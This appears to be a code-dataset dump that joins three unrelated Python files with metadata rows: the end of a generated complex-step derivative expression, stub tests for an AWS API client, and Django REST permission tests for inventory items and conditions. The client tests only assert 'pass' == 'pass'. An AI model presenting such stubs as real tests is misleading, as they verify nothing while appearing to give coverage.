(tf)*(-np.imag(-lamP12_N*p11_n*p11_s*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_s*x_n*x_s*yb*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_s*xb*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p22_s*xb*yb*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p12_n*p22_s*y_n*y_s*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n*p22_s*yb**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p22_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p22_s*y_n*y_s*yb*(1.0e-100*1j + p22_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 
lamP22_N*p22_s*yb**2*(1.0e-100*1j + p22_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_s*x_n*x_s*yb*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_s*xb*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_s*xb*yb*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_s*p23_n*y_n**2*y_s**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p22_s*p23_n*y_n*y_s*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_s*p23_n*yb**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(lamP22_N*p23_s*v*(1.0e-100*1j + p23_n)*cos(theta_n*theta_s)/p22_s - lamP13_N*p11_n*p11_s*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_n*p11_s*p23_s*x_n*x_s*yb*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_n*p11_s*p23_s*xb*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p23_s*xb*yb*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p12_n*p12_s*p23_s*y_n*y_s*yb*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_s*yb**2*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p22_n*p22_s*y_n*y_s*yb*(1.0e-100*1j + 
p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*yb**2*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_s*x_n*x_s*yb*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_s*xb*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*xb*yb*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_n*p13_s*p23_s*y_n*y_s*yb*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*yb**2*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-lamP13_N*p33_s*v*(1.0e-100*1j + p33_n)*sin(theta_n*theta_s)/p13_s + lamP23_N*p33_s*v*(1.0e-100*1j + p33_n)*cos(theta_n*theta_s)/p23_s)/1e-100),
tf*0,
])
tock = toc()
print(gx)
print('N:' + str(tock))
print(fx-gx)
| 762.776596
| 13,295
| 0.570285
| 22,234
| 71,701
| 1.543807
| 0.003238
| 0.066599
| 0.082389
| 0.079359
| 0.985608
| 0.983802
| 0.98118
| 0.979228
| 0.973168
| 0.96842
| 0
| 0.169325
| 0.10269
| 71,701
| 94
| 13,296
| 762.776596
| 0.364186
| 0
| 0
| 0.12987
| 0
| 0
| 0.000056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.051948
| 0
| 0.051948
| 0.064935
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a6d39f0aca95fe01957c9787c5e5277c9a68086e
| 832
|
py
|
Python
|
aws_data_tools/client/tests/test_client.py
|
timoguin/aws-data-tools-py
|
f986daea360d3ffdb49a60c28d150254bb76b251
|
[
"MIT"
] | 4
|
2021-06-10T05:41:39.000Z
|
2021-12-17T14:51:45.000Z
|
aws_data_tools/client/tests/test_client.py
|
timoguin/aws-data-tools-py
|
f986daea360d3ffdb49a60c28d150254bb76b251
|
[
"MIT"
] | 3
|
2021-12-10T20:55:06.000Z
|
2022-01-28T00:27:18.000Z
|
aws_data_tools/client/tests/test_client.py
|
timoguin/aws-data-tools-py
|
f986daea360d3ffdb49a60c28d150254bb76b251
|
[
"MIT"
] | null | null | null |
from aws_data_tools.client import APIClient # noqa: F401
class TestAPIClient:
    """Placeholder test suite for the APIClient class.

    Each case is currently a stub whose assertion is trivially true; the
    suite exists so the test layout is in place before real coverage lands.
    """

    def test_api(self):
        """Stub: exercising API calls through the client."""
        assert "pass" == "pass"

    def test_init_with_client(self):
        """Stub: constructing an APIClient around a caller-supplied botocore client."""
        assert "pass" == "pass"

    def test_init_with_client_kwargs(self):
        """Stub: constructing an APIClient that forwards kwargs to the botocore client."""
        assert "pass" == "pass"

    def test_init_with_session(self):
        """Stub: constructing an APIClient around a caller-supplied botocore session."""
        assert "pass" == "pass"

    def test_init_with_session_kwargs(self):
        """Stub: constructing an APIClient that forwards kwargs to the botocore session."""
        assert "pass" == "pass"
| 32
| 88
| 0.65625
| 106
| 832
| 4.990566
| 0.292453
| 0.090737
| 0.132325
| 0.128544
| 0.714556
| 0.714556
| 0.714556
| 0.714556
| 0.533081
| 0.192817
| 0
| 0.004754
| 0.241587
| 832
| 25
| 89
| 33.28
| 0.833597
| 0.395433
| 0
| 0.416667
| 0
| 0
| 0.084746
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.416667
| false
| 0.416667
| 0.083333
| 0
| 0.583333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
470efd1a2cd51e72d6821a16e463fa493139be40
| 52,602
|
py
|
Python
|
inventory/invoices/api/tests/test_invoices_api.py
|
cnobile2012/inventory
|
bc09ccdead39a5cd758088dbfe5c56dec43c7e29
|
[
"MIT"
] | 10
|
2015-02-16T17:12:44.000Z
|
2021-06-04T18:14:01.000Z
|
inventory/invoices/api/tests/test_invoices_api.py
|
cnobile2012/inventory
|
bc09ccdead39a5cd758088dbfe5c56dec43c7e29
|
[
"MIT"
] | 1
|
2021-09-20T01:17:38.000Z
|
2021-09-20T01:17:50.000Z
|
inventory/invoices/api/tests/test_invoices_api.py
|
cnobile2012/inventory
|
bc09ccdead39a5cd758088dbfe5c56dec43c7e29
|
[
"MIT"
] | 5
|
2015-09-09T02:01:33.000Z
|
2021-05-29T09:09:14.000Z
|
# -*- coding: utf-8 -*-
#
# inventory/invoices/api/tests/test_invoices_api.py
#
from django.contrib.auth import get_user_model
from dcolumn.dcolumns.models import ColumnCollection
from rest_framework.reverse import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from inventory.common.api.tests.base_test import BaseTest
from inventory.invoices.models import Condition, Item, Invoice, InvoiceItem
from inventory.projects.models import Membership
UserModel = get_user_model()
class TestConditionAPI(BaseTest, APITestCase):
    """Permission checks for the ``condition-list``/``condition-detail`` endpoints."""

    def __init__(self, name):
        super().__init__(name)

    def setUp(self):
        super().setUp()

    def test_GET_condition_list_with_invalid_permissions(self):
        """A GET on the condition list is rejected for users lacking permission."""
        #self.skipTest("Temporarily skipped")
        list_uri = reverse('condition-list')
        self._test_users_with_invalid_permissions(
            list_uri, 'get', default_user=False)

    def test_GET_condition_list_with_valid_permissions(self):
        """A GET on the condition list succeeds for properly permissioned users."""
        #self.skipTest("Temporarily skipped")
        list_uri = reverse('condition-list')
        self._test_users_with_valid_permissions(
            list_uri, 'get', default_user=False)

    def test_OPTIONS_condition_list_with_invalid_permissions(self):
        """OPTIONS on the condition list is rejected without permission."""
        #self.skipTest("Temporarily skipped")
        list_uri = reverse('condition-list')
        self._test_users_with_invalid_permissions(
            list_uri, 'options', default_user=False)

    def test_OPTIONS_condition_list_with_valid_permissions(self):
        """OPTIONS on the condition list returns the expected metadata."""
        list_uri = reverse('condition-list')
        self._test_users_with_valid_permissions(
            list_uri, 'options', default_user=False)

    def test_GET_condition_detail_with_invalid_permissions(self):
        """A GET on a condition detail is rejected without permission."""
        #self.skipTest("Temporarily skipped")
        detail_uri = reverse('condition-detail', kwargs=dict(pk=1))
        self._test_users_with_invalid_permissions(detail_uri, 'get')

    def test_GET_condition_detail_with_valid_permissions(self):
        """A GET on a condition detail succeeds with permission."""
        #self.skipTest("Temporarily skipped")
        detail_uri = reverse('condition-detail', kwargs=dict(pk=1))
        self._test_users_with_valid_permissions(detail_uri, 'get')

    def test_OPTIONS_condition_detail_with_invalid_permissions(self):
        """OPTIONS on a condition detail is rejected without permission."""
        #self.skipTest("Temporarily skipped")
        detail_uri = reverse('condition-detail', kwargs=dict(pk=1))
        self._test_users_with_invalid_permissions(detail_uri, 'options')

    def test_OPTIONS_condition_detail_with_valid_permissions(self):
        """OPTIONS on a condition detail returns the expected metadata."""
        detail_uri = reverse('condition-detail', kwargs=dict(pk=1))
        self._test_users_with_valid_permissions(detail_uri, 'options')
class TestItemAPI(BaseTest, APITestCase):
    """Permission and business-rule tests for the ``item-list``/``item-detail``
    endpoints.

    The ``data`` dicts built below are keyed by role code — SU/AD/DU and
    POW/PMA/PDU. Presumably these map to superuser/administrator/default-user
    and project owner/manager/user respectively (the permission helpers live in
    ``BaseTest``) — TODO confirm against BaseTest.
    """

    def __init__(self, name):
        super().__init__(name)

    def setUp(self):
        super().setUp()
        # Create an InventoryType and Project.
        self.in_type = self._create_inventory_type()
        members = [
            {'user': self.user, 'role_text': self.PROJECT_USER}
        ]
        self.project = self._create_project(self.in_type, members=members)
        kwargs = {'public_id': self.project.public_id}
        self.project_uri = reverse('project-detail', kwargs=kwargs)
        # Create a ColumnCollection (dcolumn container items attach to).
        kwargs = {}
        kwargs['name'] = "Test Collection"
        kwargs['related_model'] = 'item'
        kwargs['creator'] = self.user
        kwargs['updater'] = self.user
        self.collection = ColumnCollection(**kwargs)
        self.collection.save()

    def _create_shared_project_objects(self):
        """Build two projects, one item each, and return the handles needed by
        the shared-project tests: the second user's client, the first item's
        detail URI, and both (project, item) pairs.
        """
        # Add the default user to the default project and create an item
        item_number_0 = "LM7805"
        item_0 = self._create_item(
            self.project, self.collection, item_number_0)
        uri = reverse('item-detail', kwargs={'public_id': item_0.public_id})
        # Create a second user
        user, client = self._create_user(
            username="SecondUser", password="0987654321")
        # Create second project with second user
        members = [
            {'user': user, 'role_text': self.PROJECT_USER}
        ]
        project = self._create_project(self.in_type, members=members)
        # Create an item for second project sharing default project
        item_number_1 = "NE555"
        item_1 = self._create_item(project, self.collection, item_number_1)
        return client, uri, self.project, item_0, project, item_1

    def test_GET_item_list_with_invalid_permissions(self):
        """
        Test the item_list endpoint with no permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'get'
        item_number = "NE555"
        item = self._create_item(self.project, self.collection, item_number)
        uri = reverse('item-list')
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_GET_item_list_with_valid_permissions(self):
        """
        Test the item_list endpoint with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'get'
        item_number = "NE555"
        item = self._create_item(self.project, self.collection, item_number)
        uri = reverse('item-list')
        self._test_users_with_valid_permissions(uri, method,
                                                default_user=False)
        self._test_project_users_with_valid_permissions(uri, method)

    def test_POST_item_list_with_invalid_permissions(self):
        """
        Test that a POST to item_list fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'post'
        uri = reverse('item-list')
        # Build one payload per role; AD/DU/etc. share copies of the SU dict.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'NE555'
        su['project'] = self.project_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)

    def test_POST_item_list_with_valid_permissions(self):
        """
        Test that a POST to item_list passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'post'
        uri = reverse('item-list')
        # Each role gets a distinct item_number so the POSTs don't collide.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'NE555'
        su['project'] = self.project_uri
        ad = data.setdefault('AD', su.copy())
        ad['item_number'] = 'NE556N'
        du = data.setdefault('DU', su.copy())
        du['item_number'] = 'LM311'
        self._test_users_with_valid_permissions(
            uri, method, request_data=data)
        # NOTE(review): `pow` shadows the builtin; harmless here but worth renaming.
        pow = data.setdefault('POW', su.copy())
        pow['item_number'] = 'UA1489'
        pma = data.setdefault('PMA', su.copy())
        pma['item_number'] = 'UA1488'
        pdu = data.setdefault('PDU', su.copy())
        pdu['item_number'] = 'LM393D'
        self._test_project_users_with_valid_permissions(
            uri, method, project_user=False, request_data=data)

    def test_OPTIONS_item_list_with_invalid_permissions(self):
        """
        Test that the method OPTIONS fails with invald permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'options'
        uri = reverse('item-list')
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_OPTIONS_item_list_with_valid_permissions(self):
        """
        Test that the method OPTIONS brings back the correct data.
        """
        method = 'options'
        uri = reverse('item-list')
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)

    def test_GET_item_detail_with_invalid_permissions(self):
        """
        Test that a GET on the item_detail fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        method = 'get'
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_GET_item_detail_with_valid_permissions(self):
        """
        Test that a GET to item_detail passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        method = 'get'
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)

    def test_PUT_item_detail_with_invalid_permissions(self):
        """
        Test that a PUT to item_detail fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        method = 'put'
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'NE555'
        su['project'] = self.project_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)

    def test_PUT_item_detail_with_valid_permissions(self):
        """
        Test that a PUT to item_detail passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        method = 'put'
        # Distinct item_number per role, same pattern as the POST valid test.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'NE555'
        su['project'] = self.project_uri
        ad = data.setdefault('AD', su.copy())
        ad['item_number'] = 'NE556N'
        du = data.setdefault('DU', su.copy())
        du['item_number'] = 'LM311'
        self._test_users_with_valid_permissions(
            uri, method, request_data=data)
        pow = data.setdefault('POW', su.copy())
        pow['item_number'] = 'UA1489'
        pma = data.setdefault('PMA', su.copy())
        pma['item_number'] = 'UA1488'
        pdu = data.setdefault('PDU', su.copy())
        pdu['item_number'] = 'LM393D'
        self._test_project_users_with_valid_permissions(
            uri, method, project_user=False, request_data=data)

    def test_PATCH_item_detail_with_invalid_permissions(self):
        """
        Test that a PATCH to item_detail fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        method = 'patch'
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'NE556N'
        su['project'] = self.project_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)

    def test_PATCH_item_detail_with_valid_permissions(self):
        """
        Test that a PATCH to item_detail passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        method = 'patch'
        # PATCH payloads are partial: each role sends only item_number.
        data = {}
        su = data.setdefault('SU', {})
        su['item_number'] = 'NE556N'
        ad = data.setdefault('AD', {})
        ad['item_number'] = 'LM311'
        du = data.setdefault('DU', {})
        du['item_number'] = 'UA1489'
        self._test_users_with_valid_permissions(
            uri, method, request_data=data)
        pow = data.setdefault('POW', {})
        pow['item_number'] = 'UA1488'
        pma = data.setdefault('PMA', {})
        pma['item_number'] = 'LM393D'
        pdu = data.setdefault('PDU', {})
        pdu['item_number'] = 'ULN2003A'
        self._test_project_users_with_valid_permissions(
            uri, method, project_user=False, request_data=data)

    def test_DELETE_item_detail_with_invalid_permissions(self):
        """
        Test that a DELETE to item_detail fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'delete'
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_DELETE_item_detail_with_valid_permissions(self):
        """
        Test that a DELETE to item_detail pass' with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'delete'
        # Each role deletes its own freshly-created item, and the follow-up
        # GET is expected to error since the item is gone.
        # Test SUPERUSER
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        self._test_superuser_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test ADMINISTRATOR
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        self._test_administrator_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test DEFAULT_USER
        ## This is an invalid test since the DEFAULT_USER has no access.
        # Test PROJECT_OWNER
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        self._test_project_owner_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test PROJECT_MANAGER
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        self._test_project_manager_with_valid_permissions(uri, method)
        self._test_valid_GET_with_errors(uri)
        # Test PROJECT_USER
        ## This is an invalid test since the PROJECT_USER has no access.

    def test_OPTIONS_item_detail_with_invalid_permissions(self):
        """
        Test that the method OPTIONS fails with invald permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'options'
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)

    def test_OPTIONS_item_detail_with_valid_permissions(self):
        """
        Test that the method OPTIONS brings back the correct data.
        """
        #self.skipTest("Temporarily skipped")
        method = 'options'
        item = self._create_item(self.project, self.collection, "NE555")
        uri = reverse('item-detail', kwargs={'public_id': item.public_id})
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)

    #
    # Test Business Rules
    #
    def test_POST_item_list_PROJECT_USER_invalid_permissions(self):
        """
        Test that a POST by a PROJECT_USER fails.
        """
        uri = reverse('item-list')
        data = {}
        data['item_number'] = 'NE555'
        # POST with an incomplete payload via the default client; a 400 Bad
        # Request is expected.
        response = self.client.post(uri, data=data, **self.HEADERS)
        msg = (f"Response: {response.status_code} "
               f"should be {status.HTTP_400_BAD_REQUEST}, "
               f"content: {response.data}, uri: {uri}")
        self.assertEqual(
            response.status_code, status.HTTP_400_BAD_REQUEST, msg)

    def test_GET_only_shared_projects(self):
        """
        Test read only capability of item from shared projects.
        """
        #self.skipTest("Temporarily skipped")
        # Create objects
        (client, uri,
         project_0, item_0,
         project_1, item_1) = self._create_shared_project_objects()
        # NOTE(review): this first GET asserts 200 even before the item is
        # shared — confirm whether a non-shared read is meant to succeed.
        response = client.get(uri, **self.HEADERS)
        msg = (f"Response: {response.status_code} "
               f"should be {status.HTTP_200_OK}, "
               f"content: {response.data}, uri: {uri}")
        self.assertEqual(response.status_code, status.HTTP_200_OK, msg)
        # Share the default project's item with second project.
        item_0.process_shared_projects([project_1])
        # Test that second project can read default project's item.
        response = client.get(uri, **self.HEADERS)
        msg = (f"Response: {response.status_code} should be "
               f"{status.HTTP_200_OK}, content: {response.data}, uri: {uri}")
        self.assertEqual(response.status_code, status.HTTP_200_OK, msg)

